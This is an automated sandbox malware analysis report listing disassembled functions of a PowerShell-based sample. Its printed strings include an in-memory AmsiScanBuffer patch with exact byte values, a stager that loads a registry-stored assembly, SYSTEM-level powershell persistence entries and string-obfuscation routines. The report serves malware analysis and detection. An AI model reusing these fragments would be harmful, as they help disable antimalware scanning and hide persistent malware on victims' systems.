MOC, xrefs: 000001B4448A9B6F
RCC, xrefs: 000001B4448A9B77

Memory Dump Source

Source File: 00000014.00000003.2318613329.000001B4448A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B4448A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_1b4448a0000_conhost.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: c273f95c1d4dd572484496cb5dd539a97e22d3b6e29a4f318f1dec697bd60054
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 6061B376508BC486EB719F55E4407DAB7A0FB85B88F048615EB9827BD6DFBCC1A4CB00

Function 000001B4449025DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001B4449026C2
StrCpyW.SHLWAPI ref: 000001B4449026D9

Strings

\\.\pipe\, xrefs: 000001B4449026CD

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 7aba8c29a8fa8317b458f918913602b582cb017f8d2b8e472824f08dcc8214e1
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: E951E73620478183EA68DE3AA4D43EAB7B5F3D5B80F548025DE5943B8BDF35D824E740

Function 000001B444912660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001B444912778
GetLastError.KERNEL32 ref: 000001B44491279D

Strings

U, xrefs: 000001B444912722

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 85fa521bdd48d441a0ca00196e9b8b459b6bf834f673fe7b144f1b4f579e199b
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 5241D032625A8087FB60DF75E4847DAB7B0F388795F848122EA8D87799EF38C451DB40

Function 000001B444909178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001B4449091C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000001B4449087F7), ref: 000001B444909209

Strings

csm, xrefs: 000001B4449091F6

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 74c18a965068b58da594729a1038fa22c07c6f59e6fecfb0394c57f37888184d
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: BC112B32214B8082EB618B25F484399B7F5F788B94F588224EF8D07B66DF3CC561CB00

Function 000001B444901D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001B444901D69
HeapAlloc.KERNEL32 ref: 000001B444901D77
GetProcessHeap.KERNEL32 ref: 000001B444901D9C
HeapFree.KERNEL32 ref: 000001B444901DAA

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: baf88d9b3d119753d2ff4592d1f21a3dba521a6d3ef9bedb10f77628f3352576
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: BB11C031A01B80C2EA55CF76A88529977B1F788FD5F598028DE4E57726EF39C492D300

Function 000001B444901264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001B44490126A
HeapAlloc.KERNEL32 ref: 000001B444901279
GetProcessHeap.KERNEL32 ref: 000001B444901293
HeapAlloc.KERNEL32 ref: 000001B4449012A4

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 2cbb33185c4f5e8043ffebbbb0389f082068871ba2ed80542e2b5667bbad0054
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 68E06D316016049BF7558F62E84878936F1FB88F2AF46C024CD0907351EF7DC4A9A740

Analysis Process: powershell.exePID: 7580, Parent PID: 7080COMMON

Executed Functions

Function 04BCD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2173090476.0000000004BCD000.00000040.00000001.00020000.00000000.sdmp, Offset: 04BCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_4bcd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f7dbb3449fbc1184a22e81f949b0e63bd6bce6b0593d4d9e16497f198ec2ba1
Instruction ID: 680ee4b9d981887b2f1a976db0f6302c34ff3cbccbed4f14f940c8bf45dde244
Opcode Fuzzy Hash: 3f7dbb3449fbc1184a22e81f949b0e63bd6bce6b0593d4d9e16497f198ec2ba1
Instruction Fuzzy Hash: 3301F7755053049BE7104E39DCC0B67BF9CEF41625F18C4ADDC090B242C278A442C7B1

Function 04BCD005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2173090476.0000000004BCD000.00000040.00000001.00020000.00000000.sdmp, Offset: 04BCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_4bcd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 220578b190f91b565c649cf82e8cd15e813bf6ec302f773978afefc7eec6e57f
Instruction ID: 152f26fea87bcd253e4cbf5d97a6eb921c352d4a2683aef825329b39ba1880a3
Opcode Fuzzy Hash: 220578b190f91b565c649cf82e8cd15e813bf6ec302f773978afefc7eec6e57f
Instruction Fuzzy Hash: 6F01527100D3845FD7124B25DC94752BFA8DF42224F1985EBD9988F193C2696C45C771

Analysis Process: powershell.exePID: 7972, Parent PID: 7580COMMON

Execution Graph

Execution Coverage:	76.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	25.5%
Total number of Nodes:	102
Total number of Limit Nodes:	10

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004011AD Relevance: 42.4, APIs: 20, Strings: 4, Instructions: 356
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32($rbx-svc64), ref: 004011C2
SysAllocString.OLEAUT32(00402234), ref: 004011CC
SysAllocString.OLEAUT32(powershell), ref: 004011D8
SysAllocString.OLEAUT32(?), ref: 004011E0
SysAllocString.OLEAUT32(0040218C), ref: 004011EA
SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
VariantInit.OLEAUT32(?), ref: 00401250
VariantInit.OLEAUT32(?), ref: 004013EA
VariantInit.OLEAUT32(?), ref: 004013F0
VariantInit.OLEAUT32(?), ref: 00401400
CoUninitialize.COMBASE ref: 004014E8
SysFreeString.OLEAUT32(?), ref: 004014FA
SysFreeString.OLEAUT32(00000000), ref: 004014FD
SysFreeString.OLEAUT32(?), ref: 00401502
SysFreeString.OLEAUT32(?), ref: 00401507
SysFreeString.OLEAUT32(?), ref: 0040150C
SysFreeString.OLEAUT32(?), ref: 00401511

Strings

$rbx-svc64, xrefs: 004011C0, 004011C1
SYSTEM, xrefs: 004011EC
powershell, xrefs: 004011D0
$rbx-svc32, xrefs: 004011B6

Memory Dump Source

Source File: 00000025.00000002.2163633416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_400000_powershell.jbxd

Similarity

API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
String ID: $rbx-svc32$$rbx-svc64$SYSTEM$powershell
API String ID: 3960698109-3701805373
Opcode ID: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
Instruction ID: 37100555a8a6d5ebab17ddb862eb0107d88f8e52c3f2eb0dc8ef098a6b7a2dd9
Opcode Fuzzy Hash: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
Instruction Fuzzy Hash: D5C1FC71E00119EFDB00DFA5C988DAEBBB9FF49354B1040A9E905FB2A0DB75AD06CB51

Function 004017A5 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
RegSetValueExW.KERNELBASE(?,$rbx-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818

Part of subcall function 00401868: GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
Part of subcall function 00401868: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
Part of subcall function 00401868: StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In), ref: 004018CB
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF

Part of subcall function 00401674: SysAllocString.OLEAUT32($rbx-svc32), ref: 00401686
Part of subcall function 00401674: SysAllocString.OLEAUT32(0040218C), ref: 00401690
Part of subcall function 00401674: CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
Part of subcall function 00401674: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
Part of subcall function 00401674: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
Part of subcall function 00401674: VariantInit.OLEAUT32(?), ref: 004016EE

Part of subcall function 00401674: CoUninitialize.COMBASE ref: 0040177A
Part of subcall function 00401674: SysFreeString.OLEAUT32(?), ref: 0040178C
Part of subcall function 00401674: SysFreeString.OLEAUT32(00000000), ref: 0040178F

Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144

Part of subcall function 004011AD: SysAllocString.OLEAUT32($rbx-svc64), ref: 004011C2
Part of subcall function 004011AD: SysAllocString.OLEAUT32(00402234), ref: 004011CC
Part of subcall function 004011AD: SysAllocString.OLEAUT32(powershell), ref: 004011D8
Part of subcall function 004011AD: SysAllocString.OLEAUT32(?), ref: 004011E0
Part of subcall function 004011AD: SysAllocString.OLEAUT32(0040218C), ref: 004011EA
Part of subcall function 004011AD: SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
Part of subcall function 004011AD: CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
Part of subcall function 004011AD: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
Part of subcall function 004011AD: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
Part of subcall function 004011AD: VariantInit.OLEAUT32(?), ref: 00401250

Part of subcall function 0040151A: SysAllocString.OLEAUT32($rbx-svc64), ref: 0040152C
Part of subcall function 0040151A: SysAllocString.OLEAUT32(0040218C), ref: 00401538
Part of subcall function 0040151A: CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
Part of subcall function 0040151A: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
Part of subcall function 0040151A: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
Part of subcall function 0040151A: VariantInit.OLEAUT32(?), ref: 00401594

Strings

$rbx-svc64, xrefs: 00401835
SOFTWARE, xrefs: 004017F7
$rbx-stager, xrefs: 00401810
EXE, xrefs: 004017AB
@Vu, xrefs: 004017DA
$rbx-svc32, xrefs: 00401827

Memory Dump Source

Source File: 00000025.00000002.2163633416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_400000_powershell.jbxd

Similarity

API ID: String$Alloc$Initialize$Resource$CreateInitInstanceProcessSecurityVariant$FreeHeap$CurrentFindLoadLockOpenSizeofUninitializeValueWow64
String ID: $rbx-stager$$rbx-svc32$$rbx-svc64$@Vu$EXE$SOFTWARE
API String ID: 2402434814-1370148629
Opcode ID: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
Instruction ID: 66d5473efb4f301b2503ca24c6ba2de9d178356673c05167290160cc1cb4c15a
Opcode Fuzzy Hash: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
Instruction Fuzzy Hash: 541191727003156BEB1527725E8DE6B299D9B85794B14443BBA05F62E2EEB8CD00C1A8

Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039

Strings

Microsoft Base Cryptographic Provider v1.0, xrefs: 0040100E

Memory Dump Source

Source File: 00000025.00000002.2163633416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_400000_powershell.jbxd

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID: Microsoft Base Cryptographic Provider v1.0
API String ID: 1815803762-291530887
Opcode ID: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
Instruction ID: b3acd7e835805075c9d1b27062e8bfe6e8ad1c0e86411dcbfca9405e651f33df
Opcode Fuzzy Hash: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
Instruction Fuzzy Hash: C9E0E5726002247BEB304B959E8DF8B3A6CDB80654F200036B704F2190D5B08D00D268

Function 00401868 Relevance: 47.3, APIs: 8, Strings: 19, Instructions: 86
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3

Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144

StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In), ref: 004018CB
StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF

Strings

function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type], xrefs: 0040189D
GetProcAddress, xrefs: 00401914
AmsiScanBufferPtr, xrefs: 00401968
Get-Delegate, xrefs: 004018D8
LoadLibraryPtr, xrefs: 00401944
Kernel32Ptr, xrefs: 00401938
NativeMethods, xrefs: 00401908
OldProtect, xrefs: 00401974
[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe, xrefs: 004018BD
[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In, xrefs: 004018C5
LoadLibraryDelegate, xrefs: 00401920
VirtualProtectPtr, xrefs: 00401950
[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);, xrefs: 004018AE
[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);, xrefs: 004018B5
ParameterTypes, xrefs: 004018E4
ReturnType, xrefs: 004018F0
TypeBuilder, xrefs: 004018FC
VirtualProtectDelegate, xrefs: 0040192C
AmsiPtr, xrefs: 0040195C

Memory Dump Source

Source File: 00000025.00000002.2163633416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_400000_powershell.jbxd

Similarity

API ID: Process$Heap$AllocCurrentWow64
String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
API String ID: 2666690646-646820343
Opcode ID: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
Instruction ID: f846a874a752e31dd56dc30a4e6b8ff2ba80a14d39c5350a1e27bccbc54df91f
Opcode Fuzzy Hash: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
Instruction Fuzzy Hash: 6D219D9030292067D5163A621A6A92F980E8BC1B46710C03FB9457F7E9DF7D8F038BDE

Function 004019E1 Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 166
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00008000,754A2EB0,00000000,00402238), ref: 004019F4
HeapAlloc.KERNEL32(00000000), ref: 00401A01
GetProcessHeap.KERNEL32(00000000,00004000), ref: 00401A15
HeapAlloc.KERNEL32(00000000), ref: 00401A1C

Part of subcall function 00401000: CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
Part of subcall function 00401000: CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
Part of subcall function 00401000: CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039

StrStrIW.KERNELBASE(?,004037F8), ref: 00401A46
StrStrIW.SHLWAPI(00000002,004037F8), ref: 00401A6D
StrNCatW.SHLWAPI(00000000,?,?), ref: 00401A84
StrCatW.SHLWAPI(00000000,004037FC), ref: 00401A90
StrCatW.SHLWAPI(?,'+[Char](), ref: 00401AE8
StrCatW.SHLWAPI(?,?), ref: 00401AF2
StrCatW.SHLWAPI(?,'+'), ref: 00401B1C
StrCatW.SHLWAPI(00000000,?), ref: 00401B2C
StrCatW.SHLWAPI(00000000,004037FC), ref: 00401B47
StrStrIW.SHLWAPI(?,004037F8), ref: 00401B61
StrCatW.SHLWAPI(00000000,?), ref: 00401B75
StrCpyW.SHLWAPI(?,00000000), ref: 00401B7C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B8A
HeapFree.KERNEL32(00000000), ref: 00401B93
GetProcessHeap.KERNEL32(00000000,?), ref: 00401B99
RtlFreeHeap.NTDLL(00000000), ref: 00401B9C

Strings

)+', xrefs: 00401AF4
'+[Char](, xrefs: 00401ADF
'+', xrefs: 00401AFB, 00401B03, 00401B17

Memory Dump Source

Source File: 00000025.00000002.2163633416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_400000_powershell.jbxd

Similarity

API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
String ID: '+'$'+[Char]($)+'
API String ID: 3510167801-3465596256
Opcode ID: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
Instruction ID: 881abd296b23407031799d902d2f4cdc89e37ab1eeb299f195f03ae3526d8067
Opcode Fuzzy Hash: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
Instruction Fuzzy Hash: B051F1B1E00219ABCB14DFB4DD49AAE7BBDFB48301B14446AF605F7290DB78DA01DB64

Function 0040151A Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32($rbx-svc64), ref: 0040152C
SysAllocString.OLEAUT32(0040218C), ref: 00401538
CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
VariantInit.OLEAUT32(?), ref: 00401594
VariantInit.OLEAUT32(?), ref: 00401609
CoUninitialize.COMBASE ref: 00401659
SysFreeString.OLEAUT32(00000000), ref: 00401666
SysFreeString.OLEAUT32(?), ref: 0040166B

Strings

$rbx-svc64, xrefs: 0040152A, 0040152B
$rbx-svc32, xrefs: 00401520

Memory Dump Source

Source File: 00000025.00000002.2163633416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_400000_powershell.jbxd

Similarity

API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
String ID: $rbx-svc32$$rbx-svc64
API String ID: 2407135876-384997928
Opcode ID: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
Instruction ID: a7557972db62563d574e16152cd358301487189799b80a26eca7dc015dd46a94
Opcode Fuzzy Hash: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
Instruction Fuzzy Hash: FE414471E00219AFDB01EFA4CD899AFBBBDEF49314B140469FA05FB290C6B59D45CB60

Function 00401674 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 128
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32($rbx-svc32), ref: 00401686
SysAllocString.OLEAUT32(0040218C), ref: 00401690
CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
